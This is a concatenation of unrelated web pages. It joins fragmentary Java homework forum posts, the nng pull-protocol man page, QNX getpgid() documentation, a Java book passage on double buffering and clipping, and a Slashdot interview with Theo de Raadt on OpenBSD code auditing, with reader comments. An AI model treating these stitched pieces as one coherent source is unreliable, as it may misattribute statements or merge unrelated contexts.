Does anyone know how to set up the AI to always lose? or something....

Hello! Can someone please give me any advice! In the java game Pong, how do you defeat the computer? What is the code, method, or whatever that allows you to defeat the comp. please help me i need to turn this in for class.

I need help. Anything... Here it is:

public class Car {
    private String make;
    private String model;
    private int year;

    public Car() {

I'm so confused and I really need someone's assistance. I cant express how much I'd appreciate it. here is my code!

public class Airplane {
    private String make;
    private String model;
    ...
http://www.javaprogrammingforums.com/search.php?s=4acbb94b779904a5425db9c0775c44da&searchid=1461224
nng_pull(7)

NAME
    nng_pull - pull protocol

SYNOPSIS
    #include <nng/protocol/pipeline0/pull.h>

DESCRIPTION
    The pull protocol is one half of a pipeline pattern. The other half is the push protocol.

    In the pipeline pattern, pushers distribute messages to pullers. Each message sent by a pusher will be sent to one of its peer pullers, chosen in a round-robin fashion from the set of connected peers available for receiving. This property makes this pattern useful in load-balancing scenarios.

Socket Operations
    The nng_pull0_open() function creates a puller socket. This socket may be used to receive messages, but is unable to send them. Attempts to send messages will result in NNG_ENOTSUP.

    When receiving messages, the pull protocol accepts messages as they arrive from peers. If two peers both have a message ready, the order in which messages are handled is undefined.

Protocol Versions
    Only version 0 of this protocol is supported. (At the time of writing, no other versions of this protocol have been defined.)

Protocol Options
    The pull protocol has no protocol-specific options.

Protocol Headers
    The pull protocol has no protocol-specific headers.
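As an illustrative sketch (not part of the manual page), a minimal puller that receives one message might look like the following. It assumes libnng is installed and the program is linked with -lnng; the URL is an arbitrary example address.

```c
#include <stdio.h>
#include <nng/nng.h>
#include <nng/protocol/pipeline0/pull.h>

int main(void) {
    nng_socket sock;
    int rv;

    // Create the puller half of the pipeline pattern.
    if ((rv = nng_pull0_open(&sock)) != 0) {
        fprintf(stderr, "nng_pull0_open: %s\n", nng_strerror(rv));
        return 1;
    }
    // Listen for connections from pushers (example address).
    if ((rv = nng_listen(sock, "tcp://127.0.0.1:5555", NULL, 0)) != 0) {
        fprintf(stderr, "nng_listen: %s\n", nng_strerror(rv));
        nng_close(sock);
        return 1;
    }
    // Receive one message; NNG_FLAG_ALLOC lets nng allocate the buffer.
    char *buf = NULL;
    size_t sz;
    if ((rv = nng_recv(sock, &buf, &sz, NNG_FLAG_ALLOC)) == 0) {
        printf("received %zu bytes\n", sz);
        nng_free(buf, sz);
    }
    nng_close(sock);
    return 0;
}
```

A matching pusher would call nng_push0_open() and nng_dial() against the same address; each of its messages would go to exactly one connected puller.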
https://nng.nanomsg.org/man/tip/nng_pull.7.html
getpgid()

Get a process group ID

Synopsis:

#include <unistd.h>

pid_t getpgid( pid_t pid );

Arguments:
- pid - The ID of the process whose process group ID you want to get.

Library:
libc

Use the -l c option to qcc to link against this library. This library is usually included automatically.

Description:
The getpgid() function returns the process group ID for the process specified by pid. If pid is 0, getpgid() returns the calling process's group ID. In order to get the group ID of a process outside the calling process's session, your process must have the PROCMGR_AID_GETID ability enabled. For more information, see procmgr_ability().

The following definitions are worth mentioning:
- Process - An executing instance of a program, identified by a nonnegative integer called a process ID.
- Process group - A collection of one or more processes, with a unique process group ID. A process group ID is a positive integer.

Returns:
The process group ID for success, or (pid_t)-1 if an error occurs.

Errors:
If an error occurs, errno is set to:
- EPERM - The calling process doesn't have the required permission; see procmgr_ability().
- ESRCH - The process specified by pid doesn't exist.
https://developer.blackberry.com/playbook/native/reference/com.qnx.doc.neutrino.lib_ref/topic/g/getpgid.html
Having learned to walk, let's try a jog. In this section, we'll look at some techniques for doing fast and flicker-free drawing and painting. If you're interested in animation or smooth updating, you should read on.[4]

[4] At this point, you still have to build your own animation software. JavaSoft will be releasing an animation package as part of the Java Media APIs.

Drawing operations take time, and time spent drawing leads to delays and imperfect results. Our goal is to minimize the amount of drawing work we do and, as much as possible, to do that work away from the eyes of the user. You'll remember that our TestPattern applet had a blinking problem. It blinked because TestPattern performs several, large, area-filling operations each time its paint() method is called. On a very slow system, you might even be able to see each shape being drawn in succession. TestPattern could be easily fixed by drawing into an off-screen buffer and then copying the completed buffer to the display. To see how to eliminate flicker and blinking problems, we'll look at an applet that needs even more help. TerribleFlicker illustrates some of the problems of updating a display. Like many animations, it has two parts: a constant background and a changing object in the foreground. In this case, the background is a checkerboard pattern and the object is a small, scaled image we can drag around on top of it, as shown in Figure 13.6. Our first version of TerribleFlicker lives up to its name and does a very poor job of updating.
import java.awt.*;
import java.awt.event.*;

public class TerribleFlicker extends java.applet.Applet
        implements MouseMotionListener {
    int grid = 10;
    int currentX, currentY;
    Image img;
    int imgWidth = 60, imgHeight = 60;

    public void init() {
        img = getImage( getClass().getResource(getParameter("img")) );
        addMouseMotionListener( this );
    }

    public void mouseDragged( MouseEvent e ) {
        currentX = e.getX();
        currentY = e.getY();
        repaint();
    }

    public void mouseMoved( MouseEvent e ) { }  // complete MouseMotionListener

    public void paint( Graphics g ) {
        int w = getSize().width/grid;
        int h = getSize().height/grid;
        boolean black = false;
        for ( int y = 0; y <= grid; y++ )
            for ( int x = 0; x <= grid; x++ ) {
                g.setColor( (black = !black) ? Color.black : Color.white );
                g.fillRect( x * w, y * h, w, h );
            }
        g.drawImage( img, currentX, currentY, imgWidth, imgHeight, this );
    }
}

Try dragging the image; you'll notice both the background and foreground flicker as they are repeatedly redrawn. What is TerribleFlicker doing, and what is it doing wrong? As the mouse is dragged, TerribleFlicker keeps track of its position in two instance variables, currentX and currentY. On each call to mouseDragged(), the coordinates are updated, and repaint() is called to ask that the display be updated. When paint() is called, it looks at some parameters, draws the checkerboard pattern to fill the applet's area, and finally paints a small version of the image at the latest coordinates. Our first, and biggest, problem is that we are updating, but we have neglected to implement the applet's update() method with a good strategy.
Because we haven't overridden update(), we are getting the default implementation of the Component update() method, which looks something like this:

// Default implementation of applet update
public void update( Graphics g ) {
    g.setColor( getBackground() );
    g.fillRect( 0, 0, getSize().width, getSize().height );
    paint( g );
}

This method simply clears the display to the background color and calls our paint() method. This is almost never the best strategy, but is the only appropriate default for update(), which doesn't know how much of the screen we're really going to paint. Our applet paints its own background, in its entirety, so we can provide a simpler version of update() that doesn't bother to clear the display:

// add to TerribleFlicker
public void update( Graphics g ) {
    paint( g );
}

This applet works better because we have eliminated one large, unnecessary, and (in fact) annoying graphics operation. However, although we have eliminated a fillRect() call, we're still doing a lot of wasted drawing. Most of the background stays the same each time it's drawn. You might think of trying to make paint() smarter, so that it wouldn't redraw these areas, but remember that paint() has to be able to draw the entire scene because it might be called in situations when the display isn't intact. The solution is to have update() help out by restricting the area paint() can draw. The setClip() method of the Graphics class restricts the drawing area of a graphics context to a smaller region. A graphics context normally has an effective clipping region that limits drawing to the entire display area of the component. We can specify a smaller clipping region with setClip(). How is the drawing area restricted? Well, foremost, drawing operations that fall outside of the clipping region are not displayed. If a drawing operation overlaps the clipping region, we see only the part that's inside.
A second effect is that, in a good implementation, the graphics context can recognize drawing operations that fall completely outside the clipping region and ignore them altogether. Eliminating unnecessary operations can save time if we're doing something complex, like filling a bunch of polygons. This doesn't save the time our application spends calling the drawing methods, but the overhead of calling these kinds of drawing methods is usually negligible compared to the time it takes to execute them. (If we were generating an image pixel by pixel, this would not be the case, as the calculations would be the major time sink, not the drawing.) So we can save time in our applet by having our update method set a clipping region that results in only the affected portion of the display being redrawn. We can pick the smallest rectangular area that includes both the old image position and the new image position, as shown in Figure 13.7. This is the only portion of the display that really needs to change; everything else stays the same. An arbitrarily smart update() could save even more time by redrawing only those regions that have changed. However, the simple clipping strategy we've implemented here can be applied to many kinds of drawing, and gives quite good performance, particularly if the area being changed is small. One important thing to note is that, in addition to looking at the new position, our updating operation now has to remember the last position at which the image was drawn. Let's fix our applet so it will use a clipping region. To keep this short and emphasize the changes, we'll take some liberties with design and make our next example a subclass of TerribleFlicker. 
Let's call it ClippedFlicker:

public class ClippedFlicker extends TerribleFlicker {
    int nextX, nextY;

    public void mouseDragged( MouseEvent e ) {
        nextX = e.getX();
        nextY = e.getY();
        repaint();
    }

    void clipToAffectedArea( Graphics g, int oldx, int oldy,
            int newx, int newy, int width, int height ) {
        int x = Math.min( oldx, newx );
        int y = Math.min( oldy, newy );
        int w = ( Math.max( oldx, newx ) + width ) - x;
        int h = ( Math.max( oldy, newy ) + height ) - y;
        g.setClip( x, y, w, h );
    }

    public void update( Graphics g ) {
        int lastX = currentX, lastY = currentY;
        currentX = nextX;
        currentY = nextY;
        clipToAffectedArea( g, lastX, lastY, currentX, currentY,
                            imgWidth, imgHeight );
        paint( g );
    }
}

You should find that ClippedFlicker is significantly faster, though it still flickers. We'll make one more change in the next section to eliminate that. So, what have we changed? First, we've overridden mouseDragged() so that instead of setting the current coordinates of the image, it sets another pair of coordinates called nextX and nextY. These are the coordinates at which we'll display the image the next time we draw it. update() now has the added responsibility of taking the next position and making it the current position, by setting the currentX and currentY variables. This effectively decouples mouseDragged() from our painting routines. We'll discuss why this is advantageous in a bit. update() then uses the current and next coordinates to set a clipping region on the Graphics object before handing it off to paint(). We have created a new, private method to help it do this. clipToAffectedArea() takes as arguments the new and old coordinates and the width and height of the image. It determines the bounding rectangle as shown in Figure 13.7, then calls setClip() to set the clipping region. As a result, when paint() is called, it draws only the affected area of the screen. So, what's the deal with nextX and nextY?
By making update() keep track of the next, current, and last coordinates separately, we accomplish two things. First, we always have an accurate view of where the last image was drawn and second, we have decoupled where the next image will be drawn from mouseDragged(). It's important to decouple painting from mouseDragged() because there isn't necessarily a one-to-one correspondence between calls to repaint() and subsequent calls by AWT to our update() method. This isn't a defect; it's a feature that allows AWT to schedule and consolidate painting requests. Our concern is that our paint() method may be called at arbitrary times while the mouse coordinates are changing. This is not necessarily bad. If we are trying to position our object, we probably don't want the display to be redrawn for every intermediate position of the mouse. It would slow down the dragging unnecessarily. If we were concerned about getting every single change in the mouse's position, we would have two options. We could either do some work in the mouseDragged() method itself, or put our events into some kind of queue. We'll see an example of the first solution in our DoodlePad example a bit later. The latter solution would mean circumventing AWT's own event-scheduling capabilities and replacing them with our own, and we don't want to take on that responsibility. Now let's get to the most powerful technique in our toolbox: double buffering. Double buffering is a technique that fixes our flickering problems completely. It's easy to do and gives us almost flawless updates. We'll combine it with our clipping technique for better performance, but in general you can use double buffering with or without clipping. Double buffering our display means drawing into an off-screen buffer and then copying our completed work to the display in a single painting operation, as shown in Figure 13.8. 
It takes the same amount of time to draw a frame, but double buffering instantaneously updates our display when it's ready. We can get this effect by changing just a few lines of our ClippedFlicker applet. Modify update() to look like the following and add the new offScreenImage instance variable as shown:

public class DoubleBufferedClipped extends ClippedFlicker {
    Image offScreenImage;
    Graphics offScreenGC;

    public void update( Graphics g ) {
        if ( offScreenImage == null ) {
            offScreenImage = createImage( getSize().width, getSize().height );
            offScreenGC = offScreenImage.getGraphics();
        }
        int lastX = currentX, lastY = currentY;
        currentX = nextX;
        currentY = nextY;
        clipToAffectedArea( offScreenGC, lastX, lastY,
                            currentX, currentY, imgWidth, imgHeight );
        clipToAffectedArea( g, lastX, lastY,
                            currentX, currentY, imgWidth, imgHeight );
        paint( offScreenGC );
        g.drawImage( offScreenImage, 0, 0, this );
    }
}

Now, when you drag the image, you shouldn't see any flickering. The update rate should be about the same as in the previous example (or marginally slower), but the image should move from position to position without noticeable repainting. So, what have we done this time? Well, the new instance variable, offScreenImage, is our off-screen buffer. It is a drawable Image object. We can get an off-screen Image for a component with the createImage() method. createImage() is similar to getImage(), except that it produces an empty image area of the specified size. We can then use the off-screen image like our standard display area by asking it for a graphics context with the Image getGraphics() method. After we've drawn into the off-screen image, we can copy that image back onto the screen with drawImage(). The biggest change to the code is that we now pass paint() the graphics context of our off-screen buffer, rather than that of the on-screen display. paint() is now drawing on offScreenImage; it's our job to copy the image to the display when it's done.
This might seem a little suspicious to you, as we are now using paint() in two capacities. AWT calls paint() whenever it's necessary to repaint our entire applet and passes it an on-screen graphics context. When we update ourselves, however, we call paint() to do its work on our off-screen area and then copy that image onto the screen from within update(). Note that we're still clipping. In fact, we're clipping both the on-screen and off-screen buffers. Off-screen clipping has the same benefits we described earlier: AWT should be able to ignore wasted drawing operations. On-screen clipping minimizes the area of the image that gets drawn back to the display. If your display is fast, you might not even notice the savings, but it's an easy optimization, so we'll take advantage of it. We create the off-screen buffer in update() because it's a convenient and safe place to do so. Also, note that our image observer probably won't be called, since drawImage() isn't doing anything nasty like scaling, and the image itself is always available. The dispose() method of the Graphics class allows us to deallocate a graphics context explicitly when we are through with it. This is simply an optimization. If we were creating new graphics contexts frequently (say, in each paint()), we could give the system help in getting rid of them. This might provide some performance improvement when doing heavy drawing. We could allow garbage collection to reclaim the unused objects; however, the garbage collection process might be hampered if we are doing intense calculations or lots of repainting. In addition to serving as buffers for double buffering, off-screen images are useful for saving complex, hard-to-produce, background information. We'll look at a simple example: the "doodle pad." DoodlePad is a simple drawing tool that lets us scribble by dragging the mouse, as shown in Figure 13.9. It draws into an off-screen image; its paint() method simply copies the image to the display area. 
import java.awt.*;
import java.awt.event.*;

public class DoodlePad extends java.applet.Applet
        implements ActionListener {
    DrawPad dp;

    public void init() {
        setLayout( new BorderLayout() );
        add( "Center", dp = new DrawPad() );
        Panel p = new Panel();
        Button clearButton = new Button("Clear");
        clearButton.addActionListener( this );
        p.add( clearButton );
        add( "South", p );
    }

    public void actionPerformed( ActionEvent e ) {
        dp.clear();
    }
}

class DrawPad extends Canvas {
    Image drawImg;
    Graphics drawGr;
    int xpos, ypos, oxpos, oypos;

    DrawPad() {
        setBackground( Color.white );
        enableEvents( AWTEvent.MOUSE_EVENT_MASK
                      | AWTEvent.MOUSE_MOTION_EVENT_MASK );
    }

    public void processEvent( AWTEvent e ) {
        int x = ((MouseEvent)e).getX(), y = ((MouseEvent)e).getY();
        if ( e.getID() == MouseEvent.MOUSE_DRAGGED ) {
            xpos = x;
            ypos = y;
            if ( drawGr != null )
                drawGr.drawLine( oxpos, oypos, oxpos=xpos, oypos=ypos );
            repaint();
        } else if ( e.getID() == MouseEvent.MOUSE_PRESSED ) {
            oxpos = x;
            oypos = y;
        }
        super.processEvent(e);
    }

    public void update( Graphics g ) {
        paint(g);
    }

    public void paint( Graphics g ) {
        if ( drawImg == null ) {
            drawImg = createImage( getSize().width, getSize().height );
            drawGr = drawImg.getGraphics();
        }
        g.drawImage(drawImg, 0, 0, null);
    }

    public void clear() {
        drawGr.clearRect(0, 0, getSize().width, getSize().height);
        repaint();
    }
}

Give it a try. Draw a nice moose, or a sunset. I just drew a lovely cartoon of Bill Gates. If you make a mistake, hit the Clear button and start over. The parts should be familiar by now. We have made a type of Canvas called DrawPad. The new DrawPad component handles mouse events by enabling both simple mouse events (mouse clicks) and mouse motion events (mouse drags), and then overriding the processEvent() method to handle these events. By doing so, we are simulating the old (Java 1.0) event handling model; in this situation, it's a little more convenient than implementing all the methods of the MouseListener and MouseMotionListener interfaces.
The processEvent() method handles MOUSE_DRAGGED movement events by drawing lines into an off-screen image and calling repaint() to update the display. DrawPad's paint() method simply does a drawImage() to copy the off-screen drawing area to the display. In this way, DrawPad saves our sketch information. What is unusual about DrawPad is that it does some drawing outside of paint() or update(). In our clipping example, we talked about decoupling update() and mouseDragged(); we were willing to discard some mouse movements in order to save some updates. In this case, we want to let the user scribble with the mouse, so we should respond to every mouse movement. Therefore, we do our work in processEvent() itself. As a rule, we should be careful about doing heavy work in event handling methods because we don't want to interfere with other tasks the AWT thread is performing. In this case, our line drawing operation should not be a burden, and our primary concern is getting as close a coupling as possible between the mouse movement events and the sketch on the screen. In addition to drawing a line as the user drags the mouse, the part of processEvent() that handles MOUSE_DRAGGED events maintains a set of old coordinates, to be used as a starting point for the next line segment. The part of processEvent() that handles MOUSE_PRESSED events resets the old coordinates to the current mouse position whenever the user picks up and moves to a new location. Finally, DrawPad provides a clear() method that clears the off-screen buffer and calls repaint() to update the display. The DoodlePad applet ties the clear() method to an appropriately labeled button through its actionPerformed() method. What if we wanted to do something with the image after the user has finished scribbling on it? Well, as we'll see in the next section, we could get the pixel data for the image from its ImageProducer object and work with that.
It wouldn't be hard to create a save facility that stores the pixel data and reproduces it later. Think about how you might go about creating a networked "bathroom wall" where people could scribble on your Web pages.
https://docstore.mik.ua/orelly/java/exp/ch13_05.htm
Theo de Raadt Responds

A book on code auditing?
by LizardKing

Would!!!

Theo: A solid system's approach should not be based on "but it works". Yet, time and time again, we see that for most people this is the case. They don't care about good software, only about "good enough" software. So the programmers can continue to make such mistakes. Thus, I do not feel all that excited about writing a book which would simply teach people that the devil is in the details. If they haven't figured it out by now, perhaps they should consider another occupation (one where they will cause less damage).

Making the rest secure
by squiggleslash

OpenBSD has a well deserved reputation for security "out of the box" and for the fact the inbuilt tools are as secure as they're ever likely to be. However, the Ports system is, perhaps, an example of where the secure approach currently has limitations - an installation of OpenBSD running popular third-party systems like INN can only be so secure, because the auditing of INN, and other such software, is outside the scope of the BSD audit. My question is, has the OpenBSD team ever proposed looking into how to create a 'secured ports' tree, or some other similar system, that would ensure that many of the applications people specifically want secure platforms like OpenBSD to run could be as trusted as the platforms themselves?

Theo: We have our hands already pretty full, just researching new ideas in our main source tree, which is roughly 300MB in size. We also involved ourselves lightly in working with the XFree86 people a while back for some components there. Auditing the components outside of this becomes rather unwieldy. The difficulty lies not only in the volume of such code, but also in other issues. Sometimes communication with the maintainers of these other packages is difficult, for various reasons. Sometimes they are immediately turned off because we don't use the word Linux.
Some of these portable software packages are by their nature never really going to approach the quality of regular system software, because they are so bulky. But most importantly, please remember that we are also human beings, trying to live our lives in a pleasant way, and we don't usually get all that excited about suddenly burning 800 hours on some disgusting piece of badly programmed trash which we can just avoid running. I suppose that quite often some of our auditors look at a piece of code and go "oh, wow, this is really bad", and then just avoid using it. I know that doesn't make you guys feel better, but what can we say...

OpenBSD, security, et al.
by jd

With the release of SGI's B1 code, and the attempts by many U*ixen to secure their contents via capabilities, ACLs, etc., ad nauseam, how is OpenBSD approaching the issue of resource control? On a side note, is OpenBSD likely to ever head in the direction of being a distributed kernel? And, if so, how would security and resource management be maintained? (It's hard enough on a central kernel system.)

Theo: On the first question, I think there is great confusion in the land of Orange Book. Many people think that is about security. It is not. Largely, those standards are about accountability in the face of threat. Which really isn't about making systems secure. It's about knowing when your system's security breaks down. Not quite the same thing. Please count the commercially deployed C, B, or even A systems which are actually being used by real people for real work, before foaming at the mouth about it all being "so great". On the other hand, I think we will see some parts of that picture actually start to show up in real systems, over time. By the way, I am surprised to see you list ACLs, which don't really have anything to do with B1 systems. As to the second issue, I have no idea what a distributed kernel is, nor do I see how anything like that would improve the security or quality of a system.
Forks and cooperation
by PapaZit

A lot of people know that OpenBSD forked from NetBSD, and there's still some animosity between the two groups. Personally, I think that the competition has helped both groups (NetBSD now ships with far fewer open services, for example). Egos are delicate things, but do you see any chance for greater cooperation in the future, or do you see more forking and division as inevitable?

Theo: Considering that NetBSD has maintained a black-hole route to the OpenBSD project networks for roughly four years, I don't see how any cooperation at higher levels is possible. However, there are developers who work on multiple projects. Some of them used to complain about having trouble from various groups. Nowadays, I think they've got it easier. Politics do not dictate developer relationships these days. Do you want everyone to vote for the same political party, too?

Kernel design
by laertes

I have only been using OpenBSD for a short while now, so forgive me if this question is based upon some incorrect assumptions. OpenBSD's kernel design seems to be of the monolithic species. OpenVMS (no relation) and NT are two prominent operating systems that use a microkernel architecture. The microkernel design seems to me to be fundamentally more secure, since there is less privileged code. Further, if one of the servers is compromised, the damage is minimized. My question is this: Is the OpenBSD design fundamentally secure, or is it only a very well done implementation of a basically flawed design?

Theo: I don't think it makes any difference whatsoever. I think your computer science teachers are still teaching you from books written in the 80's, when the word "micro-kernel" was associated with a future utopia. We do not think that NT is a microkernel, and are you really so sure that OpenVMS is? A microkernel is not a kernel that does things through loadable modules. As well, I don't think it makes any difference, as long as a system does what it is supposed to do.
As well, I don't think it makes any difference, as long as a system does what it is supposed to do.

Where Did You Learn Your Code Audit Discipline? by EXTomar

Did the drive to audit code come from the need or the design of BSD? Or was it initially a whim? More importantly, where did you learn it from? Is there some "mentor" you looked to for rigid design? I have to admire your team's daunting code reviewing... I wonder if I'll ever have that kind of meticulous coding nature.

Theo: The auditing process developed out of a desire to improve the quality of our operating system. Once we started on it, it became fascinating, fun, and very nearly fanatical. About ten people worked together on it, basically teaching ourselves as things went along. We searched for basic source-code programmer mistakes and sloppiness, rather than "holes" or "bugs". We just kept recursing through the source tree every time we found some sloppiness. Every time we found a mistake a programmer made (such as using mktemp(3) in such a way that a filesystem race occurred), we would go throughout the source tree and fix ALL of them. Then when we fixed that one, we would find some other basic mistake, and then fix ALL of them. Yes, it's a lot of work. But it has a serious payback. Can you imagine if a Boeing engineer didn't fix ALL of the occurrences of a wiring flaw? Why not at least try to engineer software in the same way?

Firewall/NAT box by yamla

Linux has FreeSco, a product that fits on a 3.5 inch floppy disk and acts as a router and NAT (Network Address Translation). I always thought something like this would be ideal for OpenBSD. After all, I would rather trust OpenBSD than Linux for this. Are there any plans to produce something like this? Something with a very simple user interface that is quick and easy to get set up? I'd love to play with OpenBSD and do it by hand but I simply do not have the time.

Theo: I must say that I am not a fan of these floppy-based routers.
Essentially, you are taking one of the most unreliable pieces of storage known to man, and trying to build security infrastructure on it. That's madness. Just buy a small disk. Perhaps something based on a CD plus some other (non-floppy) persistent storage might be sane. But please. Not floppies. Are you mad?

Code-auditing by AT

Any advice for code auditors? Can you share any tips or techniques you have found useful in uncovering bugs? What do you first look for in a fresh piece of code? What about a mature piece of code?

Theo: I suppose the biggest tip would be to become a better programmer. In particular, study what functions the programs are calling, and ensure that the calling code is following the rules of those functions 100%. How many of you understand the complete & correct semantics of every function in libc, or even just the libc functions being called by the program you are looking at? (I mean, we went through our entire source tree, and about half the strncat() and strncpy() calls were subtly wrong, even if it only meant they copied an extra character and then zero'd it out -- it is still sloppy). We also found manual pages where functions were mis-described, and when we found those, lots of programmers had followed the instructions incorrectly...

Dual Processor Support by dragonfly_blue

Although there has been some indication that people are interested in running OpenBSD on machines with dual or quad processors, it appears that there are not enough resources and volunteers available to make this a reality. Although I use OpenBSD for my web server, I am by no means an expert at this, but I'm curious nonetheless. From what I've heard, multiprocessing support is going to be a very tricky thing to implement, because it gives rise to so many possible exploits, particularly with regards to race conditions. I also understand that it would take a remarkable amount of effort and time to rewrite much of the code base for SMP without compromising the OS's integrity.
With that in mind, what kind of resources would you need before you could seriously consider attempting dual or quad processor support? And, if you were given unlimited access to those resources, how long would it take before a -stable release would be ready? I would really like to see this feature get implemented, although I know that at this point your developer team is busy enough as it is.

Theo: At this time, we are not working on SMP. It's a lot of work, and not considered the most interesting thing to our developers. Sorry.

Time warp by rho

Thanks for your work, Theo. I use OBSD every day as a workstation and as a firewall, and the Cop-chasing-script-kiddie t-shirt is the best. If you could time warp back to the beginning of OpenBSD's development (ignoring the schism that brought you to that point), what would you do differently? Would you have chosen a more commercial focus? Pushed SMP development earlier? Run around in circles waving your hands in the air? On another note, what's your feeling about commercial use of OpenBSD? I.e., do you support it, tolerate it, or what? (Better example: I make a set-top box running OpenBSD, and I need the OS to do "X". If I called you and said, "Theo, I need OpenBSD to support 'X'", would I be told to piss up a rope, write it myself, or would the OpenBSD team do it for a price?)

Theo: The licence on our code is pretty clear. We want vendors to use our code. We want commercial operating systems to ship with OpenSSH. Not shipping with an SSH variant causes great grief, and it is time that ends. Same goes for OpenBSD. We would prefer if companies building commercial network appliances used OpenBSD, rather than writing their own operating systems. Typically, these companies are very comfortable with solving the problems within their application space. Yet, there is a history of these companies writing their own cruddy operating systems, and at the same time writing worse applications.
It would be better if routers, firewalls, telephone switches, fileservers, and whatever else used reliable components, designed by people who care. So go ahead, use any parts of OpenBSD as parts of commercial systems.

Full Disclosure And Version Numbering by Effugas

First of all, I want to thank you for the hard work you've done building OpenBSD. It truly is a wonderful package. Much of the security in OpenBSD lies under the hood in the work you've done cleansing the source of unsafe library calls. While this work is appreciated, I've become more and more concerned lately about the fact that these changes are not necessarily documented and certainly not reflected in the version number of an application or utility. Version numbers reflect a snapshot in the life of a codebase. They're used to reference unsafe editions or particularly stable builds. Major numbers reflect code branches, but minor numbers reflect specific states of the code -- such is the expectation of a user or an administrator when a version number is detected. Without granularity of versioning, I have no reason to trust or distrust a given application by its number; I must personally audit its source -- and end up giving it a number of my own. You and your team are code auditing masters. Rather than pollute the namespace by making your securely built modified code indistinguishable from the original (and, by extension, your secure code indistinguishable from numerous unnamed distributions' "just get it to compile" modifications), wouldn't it be appropriate for OpenBSD to apply a name extension to any package which it has modified, and in the interests of full disclosure, to provide a reasonable CHANGELOG of the fixes contained therein?

Theo: Two numbers exist for every component of OpenBSD. One number is the release that the piece came in, i.e. 2.8. The other number exists in each source file that was built. And that number is also in each binary that was built from those files.
You can use the what(1) command to determine the revisions of source files which make up each binary. As to the "original" you talk about, there is no original. OpenBSD uses its own components. I don't know what packages you are talking about. cat is cat. ftpd is ftpd. tar is tar. It's the one that came with a certain release. In the systems approach, the version numbering that other groups do is sometimes invalid, because pieces (such as libraries) are all part of the picture. Was the last plane you were on using front wheel version 2.7 or 2.9? You don't care. You do however care greatly that a "systems approach" was used to ensure that it was whole. And in the OpenBSD case, that means pick a version, and install the patches. Asking for more means that you want us to do less work on the system, and more version numbering.

Where does the money go? by MrSparkler

I've seen reports of estimated CD sales per release as being as high as 10,000. Add in t-shirt/poster sales and donations and a relatively considerable sum of money is flowing around OpenBSD. Combine this with the fact that checks are to be written to Mr. de Raadt and I get curious as to how the finances are handled. Not that I'm suggesting any misappropriation is occurring; I would just like to know who is in charge of the money and whether or not the OpenBSD project is registered as a non-profit organization (and if it is, then checks should be made out to -- and the CD image should be copyrighted to -- that organization). Also, I would like to see a small financial report put out (as would be required if it were a non-profit organization in Alberta) so that users can see where their money is going. Plus, I would also like to know exactly how many CDs are sold per release.
I greatly appreciate the work that the OpenBSD project developers have put in, and I plan on continuing to use, purchase, and donate to OpenBSD (and maybe even contribute when I get the technical skills) regardless of the answer to this question: Where exactly does the money go?

Theo: We've not yet sold 10,000 CDs in a release. Hopefully we will soon. The project ends up with a bit less than 50% of the revenues from CD sales. The t-shirt business is doing OK, but you make a lot less selling textiles. With posters we operate just above break-even. Even though some are sold on the web, most turn out to be free handouts at most conferences. That is how I planned the posters to operate. We have thought about becoming a non-profit organization, but it is not really a good idea. It would not provide any real benefit -- to you -- as the masses. Especially in Canada, there are costs and serious responsibilities associated with doing such a thing. We would be giving up a lot of freedom, and would need to hire someone to do a lot of accounting. Also, since many of our donations come from outside Canada, we still could not really generate taxable benefits to you. (And I must ask, why are people so cheap that they only give donations when it provides a partial reduction in their taxes, rather than a real donation? I actually find that pretty fake.) Money from the project goes to various things. First off, it ensures that I can work full time on OpenBSD, and not need another job. I am also hoping to do the same for other developers in the project, who have indicated that they are interested in doing so. Secondly, certain grimy, unenjoyable, and very important development tasks sometimes put a bit of money in developer pockets. Some OpenSSH work was funded by matching OpenBSD money against donations from Van Dyke. Thirdly, the project buys a fair amount of hardware: in powerpc land alone, 4 machines this year.
Fourth, shipping costs to conferences sometimes severely cut into profits from sales. And finally, when developers get together to do hacking, project money sometimes pays for various things, like airplane tickets, accommodation, and sometimes even some beer. And beer results in ideas, which results in new code.

--------------

Before you ask: yes, we'll be doing Slashdot interviews with people from other *BSD projects in the near future - Robin

Re:But he doesnt follow his own advice (Score:1)

Re:But he doesnt follow his own advice (Score:2)

In the end, I felt an interview would not *help* the OpenBSD community really, because someone would find fault in *something* and draw it out, enhance it, to really no good point at all.

Well, it seems that CyberKNet's post is a nice example of that. It's classic. You think his answers were belittling? Look at your questions, for crying out loud:

LizardKing's Q on a code auditing book -- Answered on the OBSD newsgroup already. Search deja.

Making Ports Secure -- Gee, let's ask a question to the person responsible for OS security about ALL program security that might run on the OS. iow, if there was an interview with Linus, it would be like asking him why perl on some Linux distributions had a security hole because the developers were stupid enough to hard code

B1 and OpenBSD Q -- Asked and answered when Trusted BSD came out. Search deja and misc.

Working with other BSD distributions -- Communication is a two-way road. Look, this is a silly question to ask, not because of the question, but because the answer is so readily apparent. The comments by the NetBSD and FreeBSD groups as well as users are plain to see on the newsgroups, on web pages, etc. It's all *very* public.

SMP and dual-processor support -- Search the mailing lists. Asked and answered.

Version numbering -- Already addressed when there were comments about the lack of a stable branch in OBSD.

$ issues -- Lovely. As if that wasn't an insulting question.
The "I don't want to teach you" mentality is really the "No, I don't want to feed you with a spoon." No one, including the moderators, checked to see if these questions were asked and answered by simply grepping an email archive. No Linux user in the community is going to point out that, "Hey, last year or so, there was a posting on a Debian mailing list about developers getting sick of answering lame questions too." As to the BSD and Linux community differences, well, they are different communities. I moved away from Linux because the communities just got bogged down *for my tastes*. My take is that the Linux community is *incredibly* ignorant of the BSD community, not vice versa.

filtering by FreeBSD/NetBSD (Score:3)

> a black-hole route to the OpenBSD
> project networks for roughly four years,

Those who are not familiar with Mr. Theo de Raadt's usual actions regarding the BSDs should know the following history about the mail filtering. This issue was once raised by an OpenBSD developer in the DaemonNews forum [daemonnews.org], which has a neutral position between FreeBSD, NetBSD and OpenBSD, and its conclusion was that the forum should never have posted the topic [daemonnews.org]. I don't know why Mr. de Raadt mentioned this filtering again on Slashdot. Perhaps he'd like to show that he is still ready to post mail bombs to the FreeBSD/NetBSD mailing lists?

Re:Theo: Version Number Specifics (Score:3)

Re:Theo and Microkernels (Score:2)

Secondly, pay attention to what Theo is saying: most security problems come from incorrect use of interfaces. In the microkernel world, you may indeed have fewer interfaces to the kernel, but understanding how to use those interfaces can be an extremely daunting task (just ask anyone who's hacked on Mach before).
Furthermore, you still need interfaces to all the userland code that's running on top of the kernel (i.e., if you need to interface with the filesystem, it doesn't matter whether it's in the kernel or not, you can still get the interface wrong and thereby create a security problem). In HURD, for example, the interfaces and interdependencies between modules are MORE complex, particularly given that you have to allow for an infinite number of implementations of said interfaces.

Re:Working with microkernels (Score:2)

Econ 102... (Score:3)

